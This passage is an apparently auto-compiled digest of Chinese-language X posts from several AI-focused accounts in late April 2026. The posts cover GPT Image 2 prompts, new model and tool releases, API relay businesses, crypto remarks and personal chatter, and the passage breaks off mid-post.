嘿嘿,有意思\n[原文链接](https://x.com/lxfater/status/2049754205641170992)\n\n**[2026-04-30T06:26:14+00:00]**\n> 如何用AI让美女联系任意瑜伽姿势呢? 下面一张图教你学会,更详细步骤在引用帖子里\n[原文链接](https://x.com/lxfater/status/2049737071300939914)\n\n**[2026-04-30T06:09:38+00:00]**\n> 快10w粉丝了,其实想发点总结的 但是我发现粉丝越多,自己的建议对别人就越没有用 在网上乱发建议,总有人会认为你没有资格干啥,好像你侮辱了他一样 以后多发点 适合普通人学习的 AI 小技巧好了🤗\n[原文链接](https://x.com/lxfater/status/2049732891937276350)\n\n**[2026-04-30T02:38:37+00:00]**\n> 醒来了,并没有😅\n[原文链接](https://x.com/lxfater/status/2049679788126912824)\n\n**[2026-04-29T14:50:44+00:00]**\n> 睡觉醒来,有 400 个好心人关注我,祝我破 10w 粉丝数吗?\n[原文链接](https://x.com/lxfater/status/2049501643071180855)\n\n**[2026-04-29T06:02:06+00:00]**\n> 用 GPT Image 2 赚钱,你想到几种方式? 我整理了5种,每种都有提示词,拿走能用 但还有一种方式不用自己会出图也能赚!! 有人进货四分钱,卖两毛,自己一张图都不出 闲鱼上已经有人在跑了 其余 5 种看图 完整提示词加自动化流程,请看引用文章👇\n[原文链接](https://x.com/lxfater/status/2049368609193926810)\n\n**[2026-04-29T03:28:30+00:00]**\n> R to @lxfater: 海报图片提示词 : 请生成一张随机的瑜伽宣传海报拼贴总图。 整体要求: 在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报 每张卡面尺寸随机设计铺满整张图 卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开 整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报 每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化 所有海报统一保持高级、专业、吸引…\n[原文链接](https://x.com/lxfater/status/2049329956153352499)\n\n**[2026-04-29T03:28:29+00:00]**\n> R to @lxfater: 如何使用Agent 模式 3 步: 选图像模式 选GPT-2-image 点 Agent 按钮 利用下面给的提示词,出了分镜图和人设图 接下来,利用分镜图和人设图,我们就可以控制人物动作啦!! 如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示) 得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了 多个视频就可以出系列的瑜伽动作 flo…\n[原文链接](https://x.com/lxfater/status/2049329950495310198)\n\n**[2026-04-29T03:28:28+00:00]**\n> 做内容运营,生图生视频,你现在还在跑好几个工具吗? 被朋友拉去做瑜伽图,搭了无数工作流 GPT Image 2 出来后,发现全废了 得重新规划一套,但这几天身体不舒服,没心思搞 随手把提示词扔进 flowith 试了一下 以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。 它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整 分镜图和人物图来生成出首末两张图片,用视频模式可…\n[原文链接](https://x.com/lxfater/status/2049329944052859141)\n\n**[2026-04-29T00:05:46+00:00]**\n> 看来草莓问题和洗车问题很经典了,ChatGPT都在测试\n[原文链接](https://x.com/lxfater/status/2049278935897186512)\n\n**[2026-04-28T13:31:04+00:00]**\n> Flowith出 GPT image 的生图Agent,真快呀 我赶紧试试,看看如何!!\n[原文链接](https://x.com/lxfater/status/2049119209502670864)\n\n**[2026-04-28T07:24:37+00:00]**\n> 说得太对了👍,牛逼\n[原文链接](https://x.com/lxfater/status/2049026986442707117)\n\n**[2026-04-28T06:55:56+00:00]**\n> x.com/i/article/204837140806…\n[原文链接](https://x.com/lxfater/status/2049019768456241273)\n\n**[2026-04-28T06:15:15+00:00]**\n> R to @lxfater: 来源: [1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17 [2] https://thenextweb.com/news/opena…\n[原文链接](https://x.com/lxfater/status/2049009528595685705)\n\n**[2026-04-28T06:14:44+00:00]**\n> Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法 2015 年,OpenAI 打着非营利的旗号成立 顶级研究员冲着使命感来,不要钱只要理想 Musk 看到了,砸了 3800 万进去 监管也没把它当商业公司盯 连 Musk 这种人都信了 但 CEO 在想另一件事 Altman 从 2014 年开始,在核聚变公司 Helion 买了股 2021 年一口气砸进去 3.7…\n[原文链接](https://x.com/lxfater/status/2049009402372313341)\n\n**[2026-04-28T05:41:43+00:00]**\n> GPT-5.5 在 Code Arena 排第 9 难道是 OpenAI 编程这块掉队了? 但 Arena 自己的统计负责人,几小时后发了条澄清 这榜单,当前只测前端或者说Web DEV GPT-5.5全栈和 GitHub 集成,还要几个月才上,所以现在这方面很弱。 所以不是它编码不行,是它前端这块比 Claude 弱 Code Arena,Code范围仅仅前端也太不合理了吧\n[原文链接](https://x.com/lxfater/status/2049001091916783635)\n\n---\n\n### ✅ @berryxia — Berryxia(18 条)\n\n**[2026-05-01T00:52:14+00:00]**\n> R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/\n[原文链接](https://x.com/berryxia/status/2050015406140903487)\n\n**[2026-05-01T00:52:14+00:00]**\n> 🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层! @Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能! 1. 从文本/平面图直接生成精准 BREP CAD 模型 2. Three.js 实时渲染 + Google AI 驱动,全流程端到端 3.完整开源可用\n[原文链接](https://x.com/berryxia/status/2050015402647027808)\n\n**[2026-05-01T00:08:27+00:00]**\n> OpenRouter 又上了匿名新模型Owl Alpha! 1M 上下文,强大的工具调用能力! 猜猜他是谁家的哈哈😂\n[原文链接](https://x.com/berryxia/status/2050004383971282952)\n\n**[2026-05-01T00:00:12+00:00]**\n> 兄弟们!老马家的Grok Image终于…… Grok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中! 这是一款全能创意Agent,可在无限开放画布上独立创作。 Grok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。 只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代: • 🎬 “生成一部 1 分钟电影级…\n[原文链接](https://x.com/berryxia/status/2050002308759695561)\n\n**[2026-04-30T23:56:28+00:00]**\n> 这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。 设定任务与目标 明确你希望AI智能体需要完成、达成的具体事项。 1. 编排层 Orchestration layer 相当于整套系统的控制面板,负责全局调度与流程统筹。 2. 智能体层 Agents layer 由多个专用/通用智能体组成,也就是多智能体分工协作架构。 3. 工具…\n[原文链接](https://x.com/berryxia/status/2050001371307646977)\n\n**[2026-04-30T23:46:56+00:00]**\n> 刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊! 目前已经内置于网页版的 Claude Code 中。 只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们! 这个功能挺实用,什么时候可以直接cc里可以用。 地址:https://claude.com/product/claude-security\n[原文链接](https://x.com/berryxia/status/2049998972484567491)\n\n**[2026-04-30T23:41:23+00:00]**\n> 你看看大模型有多重? 这个挺有意思的😂\n[原文链接](https://x.com/berryxia/status/2049997574229446812)\n\n**[2026-04-30T23:34:02+00:00]**\n> Claude& Blender 🐮🍺\n[原文链接](https://x.com/berryxia/status/2049995723580850235)\n\n**[2026-04-30T23:30:42+00:00]**\n> 2026年你必须了解的6个大语言模型(LLM)知识库专业术语! (大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价) 1. LLM Knowledge Base 大语言模型知识库 一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。 2. Contin…\n[原文链接](https://x.com/berryxia/status/2049994885764419789)\n\n**[2026-04-30T23:25:26+00:00]**\n> 兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了! 直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图! Prompt:👇 1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。 2. 将全景图输入你的 Codex 以获得 3D 视图。\n[原文链接](https://x.com/berryxia/status/2049993558577619280)\n\n**[2026-04-30T23:21:37+00:00]**\n> 这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。 现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!\n[原文链接](https://x.com/berryxia/status/2049992598639755395)\n\n**[2026-04-30T23:19:35+00:00]**\n> Gemini Embedding 2 已正式发布! RAG 知识库的应用又可以支持的更好了。\n[原文链接](https://x.com/berryxia/status/2049992087547130254)\n\n**[2026-04-30T23:17:56+00:00]**\n> 苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。 不知道能搞出来个啥?\n[原文链接](https://x.com/berryxia/status/2049991672155750500)\n\n**[2026-04-30T23:16:18+00:00]**\n> 在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。 他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入 “Vibe Coding”的状态。 Karpathy 将软件开发划分为三个阶段: Software 1.0 是传统显式代码编程,Software…\n[原文链接](https://x.com/berryxia/status/2049991262934380898)\n\n**[2026-04-30T23:06:04+00:00]**\n> 这一波GPT- Image-2 出圈的原因感觉更多的是将其结合游戏真实的UI设计融合且效果出奇好。 省token简单的prompt就可以完成,开发3D游戏也可以快速打好草稿。\n[原文链接](https://x.com/berryxia/status/2049988686788558992)\n\n**[2026-04-30T23:03:19+00:00]**\n> David Sacks 在 X 平台上发布了一条推文,对 AI Security Institute 刚刚发布的公告进行了回应。 AI Security Institute 宣布 OpenAI 的 GPT-5.5 模型(cyber 版本)成功完成了他们设计的“多步网络攻击模拟”。 也成为第二个能端到端完成整个攻击链的模型(第一个是 Anthropic 的 Mythos)。 在推文中,David …\n[原文链接](https://x.com/berryxia/status/2049987993193402677)\n\n**[2026-04-30T22:57:08+00:00]**\n> 𝕏 网页端更新Cashtags 功能,可以给每个股票提供实时图表。\n[原文链接](https://x.com/berryxia/status/2049986437194621357)\n\n**[2026-04-30T22:53:19+00:00]**\n> Stripe 重磅推出 Link CLI! Agent 终于能安全花钱了:单次凭证 + 同步人工审批,Claude 买礼物都不怕乱花! 1. 一行命令让 Agent 创建一次性支付凭证 2. 每次消费你都收到实时推送并用 FaceID 确认 3. 彻底解决 Agent 支付信任问题,安全又方便 4. Claude 已经实测:自己挑礼物上 Gumroad 下单,完美闭环 Agent 时代支付基础设…\n[原文链接](https://x.com/berryxia/status/2049985476334100833)\n\n---\n\n### ✅ @Pluvio9yte — 雪踏乌云(18 条)\n\n**[2026-04-30T16:37:50+00:00]**\n> OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题, 从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。 OpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。 具体证据: 1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 17…\n[原文链接](https://x.com/Pluvio9yte/status/2049890985631768653)\n\n**[2026-04-30T16:18:34+00:00]**\n> A÷你认真的吗,38分钟打满了😅\n[原文链接](https://x.com/Pluvio9yte/status/2049886136580137378)\n\n**[2026-04-30T13:35:30+00:00]**\n> 补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。\n[原文链接](https://x.com/Pluvio9yte/status/2049845097924342258)\n\n**[2026-04-30T13:01:33+00:00]**\n> 这篇文章说了很多小团队的协作经验 文里提到的一些模式我也深有体会。 曾经我也在工作之余兼职创业团队,也是toB,先打磨4个月,然后3个月赚了接近300万。 最后也是因为超预期在分钱上出了问题。 不过我没题主这么幸运,最后我一气之下离开了团队。如果在一开始就决定深入合作,找个律师过一眼合同还是挺重要的,这是我受到的教训。\n[原文链接](https://x.com/Pluvio9yte/status/2049836555171512759)\n\n**[2026-04-30T12:04:32+00:00]**\n> 这是我学习web3的一点点经验,目前刚接触不久,每一次学习和经验记录都会隔段时间记录下来,发一篇文章。 既是记录经验也是总结经验教训,欢迎各位一起围观下我的web3交易学习路径。\n[原文链接](https://x.com/Pluvio9yte/status/2049822206885286318)\n\n**[2026-04-30T12:00:57+00:00]**\n> x.com/i/article/204977806829…\n[原文链接](https://x.com/Pluvio9yte/status/2049821305072124254)\n\n**[2026-04-30T09:40:48+00:00]**\n> 欢迎大家来参加由http://dragoncode.codes举办的小黑客松 DragonCode是我和泊舟@bozhou_ai一起建立的Claude&Codex中转站,稳定运营了一段时间,也决定发起一些有意思的活动! 主题不难,围绕能够提效的小工具Vibe Coding即可 奖励: 🥇510元x1 🥈150元x2 🎁51 Dragon Code x15 参与方式见引用帖子:进群->填表>提交作品\n[原文链接](https://x.com/Pluvio9yte/status/2049786034502967620)\n\n**[2026-04-30T08:14:28+00:00]**\n> R to @Pluvio9yte: 帖子没了 可以去问grok GPT有什么促销活动\n[原文链接](https://x.com/Pluvio9yte/status/2049764309144879198)\n\n**[2026-04-30T06:49:00+00:00]**\n> 曾经国内数一数二日流水几十万的中转站88code 因拖欠巨额退款,已经秽土转生,正式换皮,改名为 Reclaude\n[原文链接](https://x.com/Pluvio9yte/status/2049742800049316039)\n\n**[2026-04-30T06:08:30+00:00]**\n> R to @Pluvio9yte: 感觉很多人都说什么便宜之类的 建议多看看这种帖子 这种的我不会写在推上 因为有风险 后面会发在博客上 多吃点好的😅😅😅\n[原文链接](https://x.com/Pluvio9yte/status/2049732608352047248)\n\n**[2026-04-30T02:28:52+00:00]**\n> 感觉已经被推荐了N次了,是有什么说法吗\n[原文链接](https://x.com/Pluvio9yte/status/2049677335767744560)\n\n**[2026-04-29T17:37:54+00:00]**\n> 有没有人跟我一样 从Manus诞生 爆火 到现在 从来都没用过🫣\n[原文链接](https://x.com/Pluvio9yte/status/2049543714566176772)\n\n**[2026-04-29T17:32:32+00:00]**\n> x.com/i/article/204900192237…\n[原文链接](https://x.com/Pluvio9yte/status/2049542362410729975)\n\n**[2026-04-29T11:46:14+00:00]**\n> 这段视频将会让你在半小时内学习 CodeX 95% 的能力 视频重点拆解了 Codex 的 7项核心能力 及 1项附加功能: 完整的文件访问权限: Codex 生成或读取的所有文件均直接存储在你的本地电脑中。它可以深度访问并分析本地文件夹的内容,例如扫描下载目录中杂乱的收据截图,然后直接在你的电脑上生成并保存一个包含分类统计与数据可视化的 Excel 仪表盘。 持久化记忆 : 系统支持“手动记忆…\n[原文链接](https://x.com/Pluvio9yte/status/2049455214550565367)\n\n**[2026-04-29T08:20:26+00:00]**\n> 兄弟们,搞3D的直接冲🤩🤩🤩 Claude上线了Blender MCP连接器, 自然语言直接操控Blender的Python API, 调场景、批量改物体、写自定义工具,不用会一行代码, 我之前在Blender写个批量脚本至少折腾半小时, 现在一句话就搞定了, 更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商, 这波是总共9个创意工具连接器一起上线\n[原文链接](https://x.com/Pluvio9yte/status/2049403423813140571)\n\n**[2026-04-29T01:16:12+00:00]**\n> RT by @Pluvio9yte: 冷知识:只要大睡特睡就可以降皮质醇、修复前额叶 经历过两天的大睡特睡,之前感觉生活里创业里无解的难题现在都可解了,建议大家都睡觉\n[原文链接](https://x.com/Pluvio9yte/status/2049296661609070997)\n\n**[2026-04-29T01:02:14+00:00]**\n> x.com/i/article/204914647001…\n[原文链接](https://x.com/Pluvio9yte/status/2049293145670836459)\n\n**[2026-04-28T18:42:36+00:00]**\n> 这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓 话不多说,看图。提示词见引用文章。\n[原文链接](https://x.com/Pluvio9yte/status/2049197606619017697)\n\n---\n\n### ✅ @liuliu — 刘进(2 条)\n\n**[2026-04-29T16:30:18+00:00]**\n> I think it is still unclear to me whether the gap between \"data in training set\" v.s. \"data in SKILL.md\" can be closed with further training on more SKILL.md, assuming latent reasoning will never mat…\n[原文链接](https://x.com/liuliu/status/2049526702334972397)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://x.com/liuliu/status/2047527371486658814)\n\n---\n\n### ✅ @CuiMao — CuiMao(18 条)\n\n**[2026-04-30T14:47:31+00:00]**\n> R to @CuiMao: 本视频由seedance2生成,切勿当真!\n[原文链接](https://x.com/CuiMao/status/2049863222195572817)\n\n**[2026-04-30T12:45:32+00:00]**\n> 有没有深圳的,我准备搬到深圳住,有什么需要注意的和推荐的,求告知。\n[原文链接](https://x.com/CuiMao/status/2049832524067794961)\n\n**[2026-04-30T12:29:09+00:00]**\n> 老板,我们私底下做中转站的勾当彻底被曝光了 @DarioAmodei\n[原文链接](https://x.com/CuiMao/status/2049828401201246395)\n\n**[2026-04-30T09:09:57+00:00]**\n> 你这个朋友我认识\n[原文链接](https://x.com/CuiMao/status/2049778271714496808)\n\n**[2026-04-29T16:57:53+00:00]**\n> 全局md里面我之前只设置了CuiMao,没设定我的中文,所以老是乱翻译。下次干活先让他去市面上打听打听我的信息,然后再回来给我干活。事半功倍。\n[原文链接](https://x.com/CuiMao/status/2049533641563484523)\n\n**[2026-04-29T16:42:47+00:00]**\n> R to @CuiMao: github.com/Cuimao777/cuimao-…\n[原文链接](https://x.com/CuiMao/status/2049529840349614318)\n\n**[2026-04-29T16:42:24+00:00]**\n> RT by @CuiMao: Deepseek v4挺好的,接入claude code花了5.65块,把英语原版的30万字汉化成了EPUB,结果还有模有样的,借鉴了宝玉 @dotey 的Skill做了节省token的优化处理方案。评论区拿skill\n[原文链接](https://x.com/CuiMao/status/2049529746279796864)\n\n**[2026-04-29T13:28:23+00:00]**\n> 加了一些 AI 大 V 的微信才发现,原来,朋友圈都是孩子的日常,都是当爹的人了,孩子老大了。\n[原文链接](https://x.com/CuiMao/status/2049480920001114551)\n\n**[2026-04-29T07:55:14+00:00]**\n> Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!\n[原文链接](https://x.com/CuiMao/status/2049397079177592925)\n\n**[2026-04-29T07:44:33+00:00]**\n> x.com/i/article/204921670329…\n[原文链接](https://x.com/CuiMao/status/2049394392776290573)\n\n**[2026-04-29T06:04:54+00:00]**\n> 呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。\n[原文链接](https://x.com/CuiMao/status/2049369313547800804)\n\n**[2026-04-28T18:44:13+00:00]**\n> 干爹发新模型了! 属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,\n[原文链接](https://x.com/CuiMao/status/2049198015232315465)\n\n**[2026-04-28T14:06:08+00:00]**\n> 50000🎉🎉\n[原文链接](https://x.com/CuiMao/status/2049128032661852434)\n\n**[2026-04-28T14:03:04+00:00]**\n> 如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。\n[原文链接](https://x.com/CuiMao/status/2049127261409034535)\n\n**[2026-04-28T13:35:22+00:00]**\n> R to @CuiMao: 支持json格式的日志导出!很重要\n[原文链接](https://x.com/CuiMao/status/2049120290949702063)\n\n**[2026-04-28T13:29:32+00:00]**\n> 因为要做benchmark,所以用claude做了个win原生的显卡监控,市面上的都过度设计给游戏用的花里胡哨。这个版本算跑起来了,下个一版本支持本地多卡监控。\n[原文链接](https://x.com/CuiMao/status/2049118822070997394)\n\n**[2026-04-28T12:11:57+00:00]**\n> 麻烦下次这种表单不要at我,我就是个傻逼,我不配。谢谢。\n[原文链接](https://x.com/CuiMao/status/2049099295337709885)\n\n**[2026-04-28T10:30:47+00:00]**\n> 😅😅玩游戏顶着 CuiMao 的 ID 被队友认出来了。\n[原文链接](https://x.com/CuiMao/status/2049073837543940468)\n\n---\n\n### ✅ @0xAA_Science — 0xAA(14 条)\n\n**[2026-04-30T12:47:23+00:00]**\n> 孜然牛肉盖饭 4u\n[原文链接](https://x.com/0xAA_Science/status/2049832988452778343)\n\n**[2026-04-30T04:08:52+00:00]**\n> 昨天 ETH 出了个rug项目 MOGG,开盘最高30M,很快跌到 200k。 最近行情本来就不好,就出了一个火箭狗跑到 200M,剩下都是小打小闹。 大家保护好本金,等待BSC行情回暖吧。\n[原文链接](https://x.com/0xAA_Science/status/2049702500622889410)\n\n**[2026-04-29T16:27:23+00:00]**\n> 君子生非异也,善假于 AI 也。 — A子\n[原文链接](https://x.com/0xAA_Science/status/2049525966628958553)\n\n**[2026-04-29T12:16:05+00:00]**\n> 已经有朋友联系我能提供0.5折的 Claude 反向代理API,还有朋友免费注册了几万个 ChatGPT plus 账号,长见识了。 建了个 WTF AI 电报群,欢迎加入,申请时记得自我介绍下: https://t.me/+ZCnxv1CA0u5jMmU1\n[原文链接](https://x.com/0xAA_Science/status/2049462724216987766)\n\n**[2026-04-28T10:24:33+00:00]**\n> 央视报道了 “渔猎齐哥” Up主,真牛逼啊。 监督环境保护,吾辈义不容辞!\n[原文链接](https://x.com/0xAA_Science/status/2049072268165497033)\n\n**[2026-04-28T05:40:29+00:00]**\n> 青椒肉丝饭 + 老盐百香果 6u\n[原文链接](https://x.com/0xAA_Science/status/2049000780519321906)\n\n**[2026-04-28T03:52:33+00:00]**\n> 快连被墙干服了,关停了中国大陆的服务。 我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。 有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。\n[原文链接](https://x.com/0xAA_Science/status/2048973617854328890)\n\n**[2026-04-27T08:47:12+00:00]**\n> Meta 对 Manus 的收购被中国发改委驳回。 看来以后要么一开始就出海,要么就不出海。\n[原文链接](https://x.com/0xAA_Science/status/2048685380304871774)\n\n**[2026-04-27T07:30:32+00:00]**\n> RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~\n[原文链接](https://x.com/0xAA_Science/status/2048666088733581805)\n\n**[2026-04-27T03:49:07+00:00]**\n> 狗B们在组团在 bags 分流太空狗,好恶心啊。 下次它们买什么,咱们就去找个新盘子分,好吗?\n[原文链接](https://x.com/0xAA_Science/status/2048610365324623966)\n\n**[2026-04-26T07:01:25+00:00]**\n> 给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。 另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。 https://github.com/AmazingAng/auth2api\n[原文链接](https://x.com/0xAA_Science/status/2048296373569941533)\n\n**[2026-04-26T04:15:19+00:00]**\n> 感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。 opus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。\n[原文链接](https://x.com/0xAA_Science/status/2048254571622113742)\n\n**[2026-04-26T02:36:56+00:00]**\n> 川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事! 枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。\n[原文链接](https://x.com/0xAA_Science/status/2048229814172275062)\n\n**[2026-04-25T04:05:21+00:00]**\n> 卧槽,收到 Cursor 送的 10,000u AI 额度! 昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了! 这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai\n[原文链接](https://x.com/0xAA_Science/status/2047889676867080420)\n\n---\n\n### ✅ @dingyi — Ding(20 条)\n\n**[2026-04-30T15:37:12+00:00]**\n> The future of product design.\n[原文链接](https://x.com/dingyi/status/2049875727689146789)\n\n**[2026-04-30T09:46:26+00:00]**\n> 最近刷推,像是逛街,中转站一条街。。。全是自卖自夸吆喝的。(无恶意就是描述一种景象\n[原文链接](https://x.com/dingyi/status/2049787450290287014)\n\n**[2026-04-30T05:57:17+00:00]**\n> 尼玛被拉了几个所谓的榜单,发现我的人设被人们定义为产品推广专家了。。。 其实我们主要帮企业做网站,以前服务过不少 Web3 公司,但现在那个行业已死,业务很少了。如果有 AI 或独立开发者需要设计方面的服务,可以来私聊。 https://vibeflow.co/\n[原文链接](https://x.com/dingyi/status/2049729786726302168)\n\n**[2026-04-30T04:49:20+00:00]**\n> 厉害啊,喜欢什么就去做什么👍\n[原文链接](https://x.com/dingyi/status/2049712686238445579)\n\n**[2026-04-30T02:36:24+00:00]**\n> 现在任何网站,其实 AI 只能做到颜色、布局、字体的复刻,Google 的 design.md 也只能做到这一步。原版里面那些精妙的动画,很多细节的东西,AI 永远都做不了。这才是设计师的价值。\n[原文链接](https://x.com/dingyi/status/2049679228908793921)\n\n**[2026-04-30T00:32:54+00:00]**\n> 2026年了,如果一个“人”突然积极回复你的每一条内容,只有一种可能:他用 AI 自动回复的。点进他主页一看,同一时间,同时回复了十几个人。 上一次有人这么积极回复,还是因为爱情。。。\n[原文链接](https://x.com/dingyi/status/2049648150605123629)\n\n**[2026-04-29T15:13:45+00:00]**\n> Pinned: Ling-2.6-flash is now open-source! A 104B MoE (7.4B active) built for agents. Ling-2.6-1T will follow today. Hugging Face: https://huggingface.co/inclusionAI/Ling-2.6-flash ModelScope: https:…\n[原文链接](https://x.com/dingyi/status/2049507438156787936)\n\n**[2026-04-29T09:38:53+00:00]**\n> 这个动效设计 skills 真好! npx skills add jakubantalik/transitions-dev\n[原文链接](https://x.com/dingyi/status/2049423162933395583)\n\n**[2026-04-29T03:49:14+00:00]**\n> 我就知道🤣🤣🤣\n[原文链接](https://x.com/dingyi/status/2049335171066061234)\n\n**[2026-04-29T01:47:21+00:00]**\n> Ghostty 离开 GitHub,同一天 Warp 宣布开源。 Warp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。 还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!\n[原文链接](https://x.com/dingyi/status/2049304499093946475)\n\n**[2026-04-28T22:59:18+00:00]**\n> 我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。 https://fatetell.com/zh-CN/invite?referral=QQE5QT\n[原文链接](https://x.com/dingyi/status/2049262208241332358)\n\n**[2026-04-28T16:58:50+00:00]**\n> So good!\n[原文链接](https://x.com/dingyi/status/2049171494329065493)\n\n**[2026-04-28T16:40:15+00:00]**\n> 最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。 https://poolside.ai/\n[原文链接](https://x.com/dingyi/status/2049166818452160778)\n\n**[2026-04-28T15:07:51+00:00]**\n> 周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣 我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。\n[原文链接](https://x.com/dingyi/status/2049143565260042558)\n\n**[2026-04-28T11:59:03+00:00]**\n> 之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧? 目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S\n[原文链接](https://x.com/dingyi/status/2049096050158551248)\n\n**[2026-04-28T09:01:04+00:00]**\n> 国内银行大概是永远也不会有这种工具了。 https://rayfinance.app/\n[原文链接](https://x.com/dingyi/status/2049051261295878623)\n\n**[2026-04-28T04:19:58+00:00]**\n> 绝了哈哈哈哈,卖铲子给卖铲子的人。。。其实就是用 new-api 一键部署一个,竟然卖这么贵。我觉得我也可以这么搞🤣\n[原文链接](https://x.com/dingyi/status/2048980519019528349)\n\n**[2026-04-28T03:26:53+00:00]**\n> 已申请!邀请你参加 Xiaomi MiMo Orbit 百万亿 Token 创造者激励计划,100T Credits 面向全球用户限时发放中... https://100t.xiaomimimo.com/\n[原文链接](https://x.com/dingyi/status/2048967160287072576)\n\n**[2026-04-28T02:14:39+00:00]**\n> 小扎当年在天安门跑步,跪舔了半天也没得到国家的好处,这次国家算是还了人情。半年后再看,谁还要收购这么个破玩意,小扎做梦都要笑醒了。 创始团队也没啥损失,再搞一个项目很快就会拿到风投估值上亿。\n[原文链接](https://x.com/dingyi/status/2048948980655292914)\n\n**[2026-04-27T13:45:23+00:00]**\n> 把 new-api 的 UI 用 Hero UI 重构了一遍。之前他们用的那个抖音的 semi 设计系统太垃圾了。\n[原文链接](https://x.com/dingyi/status/2048760423491764431)\n\n---\n\n### ✅ @GoSailGlobal — Jason Zhu(20 条)\n\n**[2026-04-30T16:25:11+00:00]**\n> 👀回顾来时路 从这条推文开始,进行了9个月的日更推文 经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索 算是找到了点出路 离职的可以参考下,在职的也要掂量下\n[原文链接](https://x.com/GoSailGlobal/status/2049887802863583240)\n\n**[2026-04-30T16:02:00+00:00]**\n> Naval 